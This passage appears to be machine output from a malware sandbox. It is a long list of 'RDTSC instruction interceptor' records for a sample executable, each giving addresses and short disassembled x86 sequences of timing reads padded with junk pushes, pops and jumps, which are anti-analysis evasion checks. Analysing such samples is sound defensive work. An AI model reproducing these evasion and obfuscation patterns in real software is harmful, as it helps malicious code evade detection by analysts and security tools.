                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38E64 second address: E38E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38E6F second address: E38E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E392E8 second address: E392EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E392EE second address: E392F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E392F2 second address: E39317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE361h 0x00000007 jl 00007F2A2CEBE356h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F2A2CEBE356h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39629 second address: E39641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2C619164h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39641 second address: E3966B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F2A2CEBE366h 0x00000014 jmp 00007F2A2CEBE35Ah 0x00000019 jnl 00007F2A2CEBE356h 0x0000001f push eax 0x00000020 pushad 0x00000021 popad 0x00000022 push edi 0x00000023 pop edi 0x00000024 pop eax 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E3966B second address: E39670 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E397B3 second address: E397C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jg 00007F2A2CEBE356h 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E397C0 second address: E397C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39B98 second address: E39BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39BA2 second address: E39BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E39BAB second address: E39BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A2CEBE35Fh 0x0000000c jmp 00007F2A2CEBE360h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E3A969 second address: E3A96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E38897 second address: E388B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007F2A2CEBE358h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F2A2CEBE356h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E388B0 second address: E388C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E427F7 second address: E42812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE366h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4221B second address: E4224E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Bh 0x00000007 jmp 00007F2A2C61915Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F2A2C619162h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4224E second address: E42276 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jbe 00007F2A2CEBE356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F2A2CEBE35Ch 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jc 00007F2A2CEBE356h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E42276 second address: E4227A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4227A second address: E4227E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4227E second address: E4228C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2A2C61915Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F5B6 second address: E4F5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Ch 0x00000009 jmp 00007F2A2CEBE35Eh 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F5D5 second address: E4F5EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2A2C619164h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F21B second address: E4F21F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F21F second address: E4F228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E4F228 second address: E4F22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E541B9 second address: E541BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E541BD second address: E541D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F2A2CEBE35Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E541D1 second address: E541FB instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A2C61915Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jno 00007F2A2C619156h 0x00000013 jl 00007F2A2C619156h 0x00000019 jnp 00007F2A2C619156h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E541FB second address: E54208 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E54208 second address: E5420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E5420E second address: E5421D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E5FFEF second address: E5FFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E5FFF3 second address: E60003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F2A2CEBE356h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E61DFE second address: E61E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E61E04 second address: E61E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2A2CEBE368h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E6A4D6 second address: E6A4E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E6A8D2 second address: E6A8D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E70D3F second address: E70D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E70D45 second address: E70D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E7DD71 second address: E7DDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2C61915Ah 0x00000011 push eax 0x00000012 jmp 00007F2A2C619166h 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E8C8FE second address: E8C908 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E8C908 second address: E8C92C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2A2C619156h 0x00000009 jmp 00007F2A2C619165h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E90FEF second address: E91020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2A2CEBE362h 0x0000000b jmp 00007F2A2CEBE364h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E91020 second address: E91024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E91024 second address: E9104A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE367h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E9104A second address: E91054 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2A2C619156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E91054 second address: E9105A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E9105A second address: E9105E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E9105E second address: E9106E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2A2CEBE356h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93E52 second address: E93E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93E5A second address: E93E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E939B1 second address: E939DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a js 00007F2A2C61916Eh 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E939DA second address: E939DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93B1C second address: E93B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2A2C619169h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93B3F second address: E93B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E93B5F second address: E93B69 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A2C61915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8042 second address: EA8048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8048 second address: EA804C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA804C second address: EA8058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8058 second address: EA805C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA805C second address: EA8060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8465 second address: EA8471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A2C619156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8471 second address: EA847C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA877C second address: EA87A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Eh 0x00000007 jnc 00007F2A2C619156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2A2C619164h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA87A8 second address: EA87C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE361h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA87C0 second address: EA87D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA87D7 second address: EA87F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F2A2CEBE360h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EA8AA0 second address: EA8AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EAA86D second address: EAA89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE369h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F2A2CEBE35Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB002F second address: EB0033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB0033 second address: EB003D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB003D second address: EB004C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB00F6 second address: EB0116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 add dh, 00000017h 0x0000000b push 00000004h 0x0000000d jne 00007F2A2CEBE359h 0x00000013 push D7202DDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB0116 second address: EB011B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB011B second address: EB0121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB0121 second address: EB0125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB0360 second address: EB03C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F2A2CEBE358h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 add dword ptr [ebp+122D264Dh], ecx 0x00000019 push dword ptr [ebp+122D1FE0h] 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F2A2CEBE358h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 or dword ptr [ebp+124558B7h], edx 0x0000003f call 00007F2A2CEBE359h 0x00000044 push eax 0x00000045 push edx 0x00000046 push edx 0x00000047 jmp 00007F2A2CEBE35Bh 0x0000004c pop edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB1873 second address: EB1888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A2C61915Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: EB1888 second address: EB188C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC9EAC second address: DC9EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC9EB3 second address: DC9EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51102C4 second address: 51102CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51102CA second address: 51102DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop ebx 0x0000000e mov dl, cl 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51102DB second address: 5110302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 8E0Bh 0x00000007 call 00007F2A2C619160h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov di, ax 0x00000018 movzx esi, bx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110302 second address: 511031D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2CEBE367h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 511031D second address: 511034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2A2C61915Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 511037B second address: 511038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F2A2CEBE35Dh 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 511038E second address: 5110394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
